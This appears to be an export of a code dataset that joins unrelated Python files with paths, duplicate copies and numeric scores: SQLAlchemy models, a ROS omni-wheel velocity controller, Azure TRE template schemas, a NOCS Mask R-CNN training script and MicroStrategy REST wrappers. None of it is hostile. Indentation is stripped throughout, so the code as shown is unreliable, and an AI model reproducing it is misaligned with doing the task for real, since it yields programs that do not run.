.filter(Tag.inSum==True, Taggroup.acc_id==account_id)
return [val for val, in q]
def list_count(account_id):
return db.session.query(db.func.count(Tag.id))\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id).scalar()
class Condition(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
cName = db.Column(db.String, nullable=False)
tag_id = db.Column(db.Integer, db.ForeignKey('tag.id'), nullable=False)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<Condition {}>'.format(self.cName)
def insert_cond(cname, tag, accid):
stmt = Condition(cName=cname, tag_id=tag, acc_id=accid)
db.session.add(stmt)
db.session.commit()
def update_cond(cid, cName, tag):
stmt = Condition.query.filter_by(id=cid).first()
stmt.cName = cName
stmt.tag_id = tag
db.session.commit()
def delete_cond(cid):
stmt = Condition.query.filter_by(id=cid).first()
db.session.delete(stmt)
db.session.commit()
def list_cond(account_id):
return db.session.query(Condition.id, Condition.cName, Condition.tag_id)\
.outerjoin(Tag, Condition.tag_id == Tag.id)\
.filter(Condition.acc_id == account_id)\
.order_by(Tag.tgr_id, Condition.tag_id, Condition.id)
def list_count(account_id):
return db.session.query(db.func.count(Condition.id)).filter(Condition.acc_id==account_id).scalar()
class Description(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
descfrom = db.Column(db.String, nullable=False)
descto = db.Column(db.String, nullable=True)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<Description {}>'.format(self.descfrom)
def insert_desc(descfrom, descto, accid):
stmt = Description(descfrom=descfrom, descto=descto, acc_id=accid)
db.session.add(stmt)
db.session.commit()
def update_desc(id, descfrom, descto):
stmt = Description.query.filter_by(id=id).first()
stmt.descfrom = descfrom
stmt.descto = descto
db.session.commit()
def delete_desc(id):
stmt = Description.query.filter_by(id=id).first()
db.session.delete(stmt)
db.session.commit()
def list_desc(account_id):
return Description.query.filter(Description.acc_id == account_id).order_by(Description.descfrom)
def list_count(account_id):
return db.session.query(db.func.count(Description.id)).filter(Description.acc_id==account_id).scalar()
#create all tables based on models above
with app.app_context():
db.create_all() | 0.393385 | 0.147034 |
import rospy
from geometry_msgs.msg import Twist
from std_msgs.msg import Float64
from std_msgs.msg import Bool
import math
pubLeft = rospy.Publisher('/setpoint_left', Float64, queue_size=10)
pubRigth = rospy.Publisher('/setpoint_right', Float64, queue_size=10)
pubFront = rospy.Publisher('/setpoint_front', Float64, queue_size=10)
pubBack = rospy.Publisher('/setpoint_back', Float64, queue_size=10)
pubEnableLeft = rospy.Publisher('/left_wheel/left_wheel_pid_activate', Bool, queue_size=10)
pubEnableRigth = rospy.Publisher('/right_wheel/right_wheel_pid_activate', Bool, queue_size=10)
pubEnableFront = rospy.Publisher('/front_wheel/front_wheel_pid_activate', Bool, queue_size=10)
pubEnableBack = rospy.Publisher('/back_wheel/back_wheel_pid_activate', Bool, queue_size=10)
velMinima = 0.3
def setDesiredVel(data):
#print "Me llego mensaje Twist:\n Lineal:\n X: ",data.linear.x,"\n Y: ",data.linear.y,"\n Z: ",data.linear.z,"\n ANGULAR:\n X: ",data.angular.x,"\n Y: ",data.angular.y,"\n Z: ",data.angular.z
#TODO: analyze the case where the X and Y components are equal, since two wheels then cancel each other out and only two keep driving...
radioRobot = 0.45
vectorDeseado = [[data.linear.x],[data.linear.y],[data.angular.z * radioRobot]]
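#each row is [-sin(theta), cos(theta), 1] for a wheel mounted at theta = 45, 135, 225 and 315 degrees; multiplying by [vx, vy, w*radioRobot] gives that wheel's speed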
matrizMotores = [[-1*math.sin(0.785398),math.cos(0.785398),1],[-1*math.sin(2.35619),math.cos(2.35619),1],[-1*math.sin(3.92699),math.cos(3.92699),1],[-1*math.sin(5.49779),math.cos(5.49779),1]]
velMotores=[[0],[0],[0],[0]]
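#manual matrix-vector multiply: velMotores = matrizMotores x vectorDeseado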
for columna in range(0,len(vectorDeseado)):
for fila in range(0,len(matrizMotores)):
velMotores[fila][0] += matrizMotores[fila][columna] * vectorDeseado[columna][0]
menor = False
"""
if(abs(data.linear.x) != abs(data.linear.y) or abs(data.angular.z) != 0):
for i in range(0,4):
print("IF num: " + str(i) + " vel: " + str(velMotores[i][0]))
if( ((velMotores[i][0] > (velMinima*-1)) and (velMotores[i][0] < velMinima)) ):
menor = True
break
else:
for i in range(0,4):
print("ELSE num: " + str(i) + " vel: " + str(velMotores[i][0]))
if( (velMotores[i][0] > (velMinima*-1)) and (velMotores[i][0] < velMinima) ):
if( (velMotores[i][0] > 0.1) or (velMotores[i][0] < -0.1) ):
menor = True
break
"""
if(not menor):
pubEnableLeft.publish(True)
pubEnableRigth.publish(True)
pubEnableFront.publish(True)
pubEnableBack.publish(True)
pubLeft.publish(velMotores[0][0])
pubFront.publish(velMotores[1][0])
pubRigth.publish(velMotores[2][0])
pubBack.publish(velMotores[3][0])
else:
pubLeft.publish(0)
pubFront.publish(0)
pubRigth.publish(0)
pubBack.publish(0)
def listener():
rospy.init_node('PID_General', anonymous=True)
rospy.Subscriber("/cmd_vel", Twist, setDesiredVel)
rospy.spin()
if __name__ == '__main__':
try:
listener()
except rospy.ROSInterruptException:
pass | src/hermesIII/src/PID_general.py | import rospy
from geometry_msgs.msg import Twist
from std_msgs.msg import Float64
from std_msgs.msg import Bool
import math
pubLeft = rospy.Publisher('/setpoint_left', Float64, queue_size=10)
pubRigth = rospy.Publisher('/setpoint_right', Float64, queue_size=10)
pubFront = rospy.Publisher('/setpoint_front', Float64, queue_size=10)
pubBack = rospy.Publisher('/setpoint_back', Float64, queue_size=10)
pubEnableLeft = rospy.Publisher('/left_wheel/left_wheel_pid_activate', Bool, queue_size=10)
pubEnableRigth = rospy.Publisher('/right_wheel/right_wheel_pid_activate', Bool, queue_size=10)
pubEnableFront = rospy.Publisher('/front_wheel/front_wheel_pid_activate', Bool, queue_size=10)
pubEnableBack = rospy.Publisher('/back_wheel/back_wheel_pid_activate', Bool, queue_size=10)
velMinima = 0.3
def setDesiredVel(data):
#print "Me llego mensaje Twist:\n Lineal:\n X: ",data.linear.x,"\n Y: ",data.linear.y,"\n Z: ",data.linear.z,"\n ANGULAR:\n X: ",data.angular.x,"\n Y: ",data.angular.y,"\n Z: ",data.angular.z
#TODO: analyze the case where the X and Y components are equal, since two wheels then cancel each other out and only two keep driving...
radioRobot = 0.45
vectorDeseado = [[data.linear.x],[data.linear.y],[data.angular.z * radioRobot]]
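#each row is [-sin(theta), cos(theta), 1] for a wheel mounted at theta = 45, 135, 225 and 315 degrees; multiplying by [vx, vy, w*radioRobot] gives that wheel's speed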
matrizMotores = [[-1*math.sin(0.785398),math.cos(0.785398),1],[-1*math.sin(2.35619),math.cos(2.35619),1],[-1*math.sin(3.92699),math.cos(3.92699),1],[-1*math.sin(5.49779),math.cos(5.49779),1]]
velMotores=[[0],[0],[0],[0]]
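#manual matrix-vector multiply: velMotores = matrizMotores x vectorDeseado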
for columna in range(0,len(vectorDeseado)):
for fila in range(0,len(matrizMotores)):
velMotores[fila][0] += matrizMotores[fila][columna] * vectorDeseado[columna][0]
menor = False
"""
if(abs(data.linear.x) != abs(data.linear.y) or abs(data.angular.z) != 0):
for i in range(0,4):
print("IF num: " + str(i) + " vel: " + str(velMotores[i][0]))
if( ((velMotores[i][0] > (velMinima*-1)) and (velMotores[i][0] < velMinima)) ):
menor = True
break
else:
for i in range(0,4):
print("ELSE num: " + str(i) + " vel: " + str(velMotores[i][0]))
if( (velMotores[i][0] > (velMinima*-1)) and (velMotores[i][0] < velMinima) ):
if( (velMotores[i][0] > 0.1) or (velMotores[i][0] < -0.1) ):
menor = True
break
"""
if(not menor):
pubEnableLeft.publish(True)
pubEnableRigth.publish(True)
pubEnableFront.publish(True)
pubEnableBack.publish(True)
pubLeft.publish(velMotores[0][0])
pubFront.publish(velMotores[1][0])
pubRigth.publish(velMotores[2][0])
pubBack.publish(velMotores[3][0])
else:
pubLeft.publish(0)
pubFront.publish(0)
pubRigth.publish(0)
pubBack.publish(0)
def listener():
rospy.init_node('PID_General', anonymous=True)
rospy.Subscriber("/cmd_vel", Twist, setDesiredVel)
rospy.spin()
if __name__ == '__main__':
try:
listener()
except rospy.ROSInterruptException:
pass | 0.127151 | 0.135604 |
from typing import List
from pydantic import BaseModel, Field
from models.domain.resource import ResourceType
from models.domain.resource_template import ResourceTemplate, Parameter
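# Schemas for the workspace template API; the sample template below is reused in the response model's OpenAPI example.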
def get_sample_workspace_template_object(template_name: str = "tre-workspace-vanilla") -> ResourceTemplate:
return ResourceTemplate(
id="a7a7a7bd-7f4e-4a4e-b970-dc86a6b31dfb",
name=template_name,
description="vanilla workspace bundle",
version="0.1.0",
parameters=[
Parameter(name="azure_location", type="string"),
Parameter(name="tre_id", type="string"),
Parameter(name="workspace_id", type="string"),
Parameter(name="address_space", type="string", default="10.2.1.0/24", description="VNet address space for the workspace services")
],
resourceType=ResourceType.Workspace,
current=True,
)
def get_sample_workspace_template() -> dict:
return get_sample_workspace_template_object().dict()
class WorkspaceTemplateNamesInList(BaseModel):
templateNames: List[str]
class Config:
schema_extra = {
"example": {
"templateNames": ["tre-workspace-vanilla", "tre-workspace-base"]
}
}
class WorkspaceTemplateInCreate(BaseModel):
name: str = Field(title="Name of workspace template")
version: str = Field(title="Version of workspace template")
description: str = Field(title="Description of workspace template")
parameters: List[Parameter] = Field([], title="Workspace template parameters", description="Values for the parameters required by the workspace template")
current: bool = Field(title="Mark this version as current")
class Config:
schema_extra = {
"example": {
"name": "my-tre-workspace",
"version": "0.0.1",
"description": "workspace template for great product",
"parameters": [{
"name": "azure_location",
"type": "string"
}],
"current": "true"
}
}
class WorkspaceTemplateInResponse(BaseModel):
workspaceTemplate: ResourceTemplate
class Config:
schema_extra = {
"example": {
"resourceTemplateId": "49a7445c-aae6-41ec-a539-30dfa90ab1ae",
"workspaceTemplate": get_sample_workspace_template()
}
} | management_api_app/models/schemas/workspace_template.py | from typing import List
from pydantic import BaseModel, Field
from models.domain.resource import ResourceType
from models.domain.resource_template import ResourceTemplate, Parameter
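# Schemas for the workspace template API; the sample template below is reused in the response model's OpenAPI example.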
def get_sample_workspace_template_object(template_name: str = "tre-workspace-vanilla") -> ResourceTemplate:
return ResourceTemplate(
id="a7a7a7bd-7f4e-4a4e-b970-dc86a6b31dfb",
name=template_name,
description="vanilla workspace bundle",
version="0.1.0",
parameters=[
Parameter(name="azure_location", type="string"),
Parameter(name="tre_id", type="string"),
Parameter(name="workspace_id", type="string"),
Parameter(name="address_space", type="string", default="10.2.1.0/24", description="VNet address space for the workspace services")
],
resourceType=ResourceType.Workspace,
current=True,
)
def get_sample_workspace_template() -> dict:
return get_sample_workspace_template_object().dict()
class WorkspaceTemplateNamesInList(BaseModel):
templateNames: List[str]
class Config:
schema_extra = {
"example": {
"templateNames": ["tre-workspace-vanilla", "tre-workspace-base"]
}
}
class WorkspaceTemplateInCreate(BaseModel):
name: str = Field(title="Name of workspace template")
version: str = Field(title="Version of workspace template")
description: str = Field(title="Description of workspace template")
parameters: List[Parameter] = Field([], title="Workspace template parameters", description="Values for the parameters required by the workspace template")
current: bool = Field(title="Mark this version as current")
class Config:
schema_extra = {
"example": {
"name": "my-tre-workspace",
"version": "0.0.1",
"description": "workspace template for great product",
"parameters": [{
"name": "azure_location",
"type": "string"
}],
"current": "true"
}
}
class WorkspaceTemplateInResponse(BaseModel):
workspaceTemplate: ResourceTemplate
class Config:
schema_extra = {
"example": {
"resourceTemplateId": "49a7445c-aae6-41ec-a539-30dfa90ab1ae",
"workspaceTemplate": get_sample_workspace_template()
}
} | 0.842215 | 0.255762 |
import argparse
import os
import sys
import datetime
import re
import time
import numpy as np
from config import Config
import utils
import model as modellib
from dataset import NOCSDataset
# Root directory of the project
ROOT_DIR = os.getcwd()
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Path to COCO trained weights
COCO_MODEL_PATH = os.path.join(MODEL_DIR, "mask_rcnn_coco.h5")
class ScenesConfig(Config):
"""Configuration for training on the toy shapes dataset.
Derives from the base Config class and overrides values specific
to the toy shapes dataset.
"""
# Give the configuration a recognizable name
NAME = "ShapeNetTOI"
OBJ_MODEL_DIR = os.path.join(ROOT_DIR, 'data', 'obj_models')
# Train on 1 GPU and 2 images per GPU. We can put multiple images on each
# GPU because the images are small. Batch size is 2 (GPUs * images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 2
# Number of classes (including background)
NUM_CLASSES = 1 + 6 # background + 6 object categories
MEAN_PIXEL = np.array([[ 120.66209412, 114.70348358, 105.81269836]])
IMAGE_MIN_DIM = 480
IMAGE_MAX_DIM = 640
RPN_ANCHOR_SCALES = (16, 32, 48, 64, 128) # anchor side in pixels
# Reduce training ROIs per image because the images are small and have
# few objects. Aim to allow ROI sampling to pick 33% positive ROIs.
TRAIN_ROIS_PER_IMAGE = 64
# Use a small epoch since the data is simple
STEPS_PER_EPOCH = 1000
# use small validation steps since the epoch is small
VALIDATION_STEPS = 50
WEIGHT_DECAY = 0.0001
LEARNING_RATE = 0.001
LEARNING_MOMENTUM = 0.9
COORD_LOSS_SCALE = 1
COORD_USE_BINS = True
if COORD_USE_BINS:
COORD_NUM_BINS = 32
else:
COORD_REGRESS_LOSS = 'Soft_L1'
COORD_SHARE_WEIGHTS = False
COORD_USE_DELTA = False
COORD_POOL_SIZE = 14
COORD_SHAPE = [28, 28]
USE_BN = True
# if COORD_SHARE_WEIGHTS:
# USE_BN = False
USE_SYMMETRY_LOSS = True
RESNET = "resnet50"
TRAINING_AUGMENTATION = True
SOURCE_WEIGHT = [3, 1, 1] #'ShapeNetTOI', 'Real', 'coco'
class InferenceConfig(ScenesConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', default='0', type=str)
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES']=args.gpu
print('Using GPU {}.'.format(args.gpu))
config = ScenesConfig()
config.display()
# dataset directories
#camera_dir = os.path.join('/6PACK/My_NOCS','data', 'camera')
camera_dir = os.path.join('/6PACK/My_NOCS','data')
real_dir = os.path.join('/6PACK/My_NOCS','data', 'real')
coco_dir = os.path.join('/6PACK/My_NOCS','data', 'coco')
# real classes
coco_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
synset_names = ['BG', #0
'bottle', #1
'bowl', #2
'camera', #3
'can', #4
'laptop',#5
'mug'#6
]
class_map = {
'bottle': 'bottle',
'bowl':'bowl',
'cup':'mug',
'laptop': 'laptop',
}
coco_cls_ids = []
for coco_cls in class_map:
ind = coco_names.index(coco_cls)
coco_cls_ids.append(ind)
config.display()
# Create model in training mode
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=MODEL_DIR)
# Which weights to start with?
init_with = "coco" # imagenet, coco, or last
if init_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model.load_weights(COCO_MODEL_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif init_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last()[1], by_name=True)
# Train the head branches
# Passing layers="heads" freezes all layers except the head
# layers. You can also pass a regular expression to select
# which layers to train by name pattern.
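# Staged schedule: train the heads to epoch 100, then ResNet stage 4+ to epoch 130, then all layers to epoch 400, dividing the learning rate by 10 at each stage.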
dataset_train = NOCSDataset(synset_names, 'train', config)
dataset_train.load_camera_scenes(camera_dir)
dataset_train.load_real_scenes(real_dir)
dataset_train.load_coco(coco_dir, "train", class_names=class_map.keys())
dataset_train.prepare(class_map)
# Validation dataset
dataset_val = NOCSDataset(synset_names, 'val', config)
dataset_val.load_camera_scenes(camera_dir)
dataset_val.prepare(class_map)
#print("Training network heads")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=100,
layers_name='heads')
# Training - Stage 2
# Finetune layers from ResNet stage 4 and up
print("Training Resnet layer 4+")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE/10,
epochs=130,
layers_name='4+')
# Training - Stage 3
# Fine-tune all layers
print("Training all layers")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE/100,
epochs=400,
layers_name='all') | research/6D_Pose/nocs_train.py | import argparse
import os
import sys
import datetime
import re
import time
import numpy as np
from config import Config
import utils
import model as modellib
from dataset import NOCSDataset
# Root directory of the project
ROOT_DIR = os.getcwd()
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Path to COCO trained weights
COCO_MODEL_PATH = os.path.join(MODEL_DIR, "mask_rcnn_coco.h5")
class ScenesConfig(Config):
"""Configuration for training on the toy shapes dataset.
Derives from the base Config class and overrides values specific
to the toy shapes dataset.
"""
# Give the configuration a recognizable name
NAME = "ShapeNetTOI"
OBJ_MODEL_DIR = os.path.join(ROOT_DIR, 'data', 'obj_models')
# Train on 1 GPU and 2 images per GPU. We can put multiple images on each
# GPU because the images are small. Batch size is 2 (GPUs * images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 2
# Number of classes (including background)
NUM_CLASSES = 1 + 6 # background + 6 object categories
MEAN_PIXEL = np.array([[ 120.66209412, 114.70348358, 105.81269836]])
IMAGE_MIN_DIM = 480
IMAGE_MAX_DIM = 640
RPN_ANCHOR_SCALES = (16, 32, 48, 64, 128) # anchor side in pixels
# Reduce training ROIs per image because the images are small and have
# few objects. Aim to allow ROI sampling to pick 33% positive ROIs.
TRAIN_ROIS_PER_IMAGE = 64
# Use a small epoch since the data is simple
STEPS_PER_EPOCH = 1000
# use small validation steps since the epoch is small
VALIDATION_STEPS = 50
WEIGHT_DECAY = 0.0001
LEARNING_RATE = 0.001
LEARNING_MOMENTUM = 0.9
COORD_LOSS_SCALE = 1
COORD_USE_BINS = True
if COORD_USE_BINS:
COORD_NUM_BINS = 32
else:
COORD_REGRESS_LOSS = 'Soft_L1'
COORD_SHARE_WEIGHTS = False
COORD_USE_DELTA = False
COORD_POOL_SIZE = 14
COORD_SHAPE = [28, 28]
USE_BN = True
# if COORD_SHARE_WEIGHTS:
# USE_BN = False
USE_SYMMETRY_LOSS = True
RESNET = "resnet50"
TRAINING_AUGMENTATION = True
SOURCE_WEIGHT = [3, 1, 1] #'ShapeNetTOI', 'Real', 'coco'
class InferenceConfig(ScenesConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', default='0', type=str)
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES']=args.gpu
print('Using GPU {}.'.format(args.gpu))
config = ScenesConfig()
config.display()
# dataset directories
#camera_dir = os.path.join('/6PACK/My_NOCS','data', 'camera')
camera_dir = os.path.join('/6PACK/My_NOCS','data')
real_dir = os.path.join('/6PACK/My_NOCS','data', 'real')
coco_dir = os.path.join('/6PACK/My_NOCS','data', 'coco')
# real classes
coco_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
synset_names = ['BG', #0
'bottle', #1
'bowl', #2
'camera', #3
'can', #4
'laptop',#5
'mug'#6
]
class_map = {
'bottle': 'bottle',
'bowl':'bowl',
'cup':'mug',
'laptop': 'laptop',
}
coco_cls_ids = []
for coco_cls in class_map:
ind = coco_names.index(coco_cls)
coco_cls_ids.append(ind)
config.display()
# Create model in training mode
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=MODEL_DIR)
# Which weights to start with?
init_with = "coco" # imagenet, coco, or last
if init_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model.load_weights(COCO_MODEL_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif init_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last()[1], by_name=True)
# Train the head branches
# Passing layers="heads" freezes all layers except the head
# layers. You can also pass a regular expression to select
# which layers to train by name pattern.
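# Staged schedule: train the heads to epoch 100, then ResNet stage 4+ to epoch 130, then all layers to epoch 400, dividing the learning rate by 10 at each stage.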
dataset_train = NOCSDataset(synset_names, 'train', config)
dataset_train.load_camera_scenes(camera_dir)
dataset_train.load_real_scenes(real_dir)
dataset_train.load_coco(coco_dir, "train", class_names=class_map.keys())
dataset_train.prepare(class_map)
# Validation dataset
dataset_val = NOCSDataset(synset_names, 'val', config)
dataset_val.load_camera_scenes(camera_dir)
dataset_val.prepare(class_map)
#print("Training network heads")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=100,
layers_name='heads')
# Training - Stage 2
# Finetune layers from ResNet stage 4 and up
print("Training Resnet layer 4+")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE/10,
epochs=130,
layers_name='4+')
# Training - Stage 3
# Fine-tune all layers
print("Training all layers")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE/100,
epochs=400,
layers_name='all') | 0.365796 | 0.301264 |
import requests
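# Typical call flow (sketch, using only the helpers in this module):
#   single-table: create_dataset(), then update_dataset() for incremental loads
#   multi-table:  create_multitable_dataset() -> upload_session() -> upload() -> publish(),
#                 polling publish_status() or aborting with publish_cancel()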
def dataset_definition(connection, dataset_id, fields=None, verbose=False):
"""Get the definition of a dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
fields (list, optional): Specifies object types to be returned. Possible values include tables, columns,
attributes, and metrics. If no value is set, attributes and metrics are returned.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.get(url=connection.base_url + '/datasets/' + dataset_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
params={'fields': fields},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def create_dataset(connection, body, verbose=False):
"""Create a single-table dataset from external data uploaded to the MicroStrategy Intelligence Server.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
body (str): JSON-formatted definition of the dataset. Generated by `utils.formjson()`.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def update_dataset(connection, dataset_id, table_name, update_policy, body, verbose=False, table_id=None):
"""Update a single-table dataset with external data uploaded to the MicroStrategy Intelligence Server.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
table_name (str): Name of the table to update within the MicroStrategy dataset.
update_policy (str): Update operation type: 'Add' (inserts new, unique rows), 'Update' (updates data in
existing rows and columns), 'Upsert' (updates existing data and inserts new rows), 'Replace' (similar to
truncate, replaces the existing data with new data).
body (str): JSON-formatted definition of the dataset. Generated by `utils.formjson()`.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.patch(url=connection.base_url + '/datasets/' + dataset_id + '/tables/' + table_name,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id,
'updatePolicy': update_policy},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def delete_dataset(connection, dataset_id, verbose=False):
"""Delete a dataset previously created using the REST API.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.delete(url=connection.base_url + '/objects/' + dataset_id + '?type=3',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies, verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def create_multitable_dataset(connection, body, verbose=False):
"""Create the definition of a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/models',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def upload_session(connection, dataset_id, body, verbose=False):
"""Create a multi-table dataset upload session.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def upload(connection, dataset_id, session_id, body, verbose=False):
"""Upload data to a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifier of the server session used for collecting uploaded data.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.put(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish(connection, dataset_id, session_id, verbose=False):
"""Publish a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifier for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id + '/publish',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish_status(connection, dataset_id, session_id, verbose=False):
"""Get multi-table dataset publication status.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifier for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.get(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id + '/publishStatus',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish_cancel(connection, dataset_id, session_id, verbose=False):
"""Delete a multi-table dataset upload session and cancel publication.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
